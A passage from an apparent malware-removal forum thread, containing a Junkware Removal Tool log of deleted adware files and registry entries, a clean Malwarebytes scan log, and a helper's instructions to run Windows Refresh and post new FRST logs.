########## EOF - C:\Program Files (x86)\AdwCleaner\AdwCleaner[s1].txt - [14961 bytes] ##########
 


JRT

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




File System: 8

Successfully deleted: C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\lbfehkoinhhcknnbdgnnmjhiladcgbol (Folder)
Successfully deleted: C:\Users\Lexi\AppData\Roaming\new version available (Folder)
Successfully deleted: C:\WINDOWS\couponprinter.ocx (File)
Successfully deleted: C:\WINDOWS\wininit.ini (File)
Successfully deleted: C:\WINDOWS\prefetch\DRIVERUPDATEUI.EXE-44B94CD5.pf (File)
Successfully deleted: C:\WINDOWS\prefetch\FREEAVIMPEGWMVMP4FLVVIDEOJOIN-BC221BAB.pf (File)
Successfully deleted: C:\WINDOWS\prefetch\FREEAVIMPEGWMVMP4FLVVIDEOJOIN-C522B191.pf (File)
Successfully deleted: C:\WINDOWS\prefetch\GOOGLETOOLBARNOTIFIER.EXE-7AE0A20E.pf (File)

user_pref(browser.urlbar.suggest.searches, true);



Registry: 2

Successfully deleted: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\\GoogleChromeAutoLaunch_AC2BF96DE3E4AFDBE25411FD527B2AD1 (Registry Value)
Successfully deleted: HKCU\Software\Microsoft\Internet Explorer\Search\\SearchAssistant (Registry Value)




~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Wed 03/09/2016 at 20:33:09.60
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 


Just in case the Malwarebytes logs are of concern to Malwarebytes, here is the log from History that corresponds with post 16.  As you can see, the timestamps are not consistent even though it was a single scan, and the data is not in agreement.

 

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 3/9/2016
Scan Time: 6:58 PM
Logfile:
Administrator: Yes

Version: 0.0.0.0000
Malware Database: v2016.03.09.06
Rootkit Database: v2016.02.27.01
License: Trial
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled

OS: Windows 10
CPU: x64
File System: NTFS
User: Lexi

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 420528
Time Elapsed: 39 min, 47 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)


(end)


Yes, please run Refresh and reboot your system when complete. As you have noted, there will be programs to re-install when the Refresh is completed; a list should be saved to your desktop when complete.... When Refresh is completed, please come back and let me know. Also run FRST and post the two fresh logs, FRST.txt and Addition.txt.

 

Your system at present was awash with many issues; I'd like to try and help you stop that happening again.....

 

Thank you,

 

Kevin.....
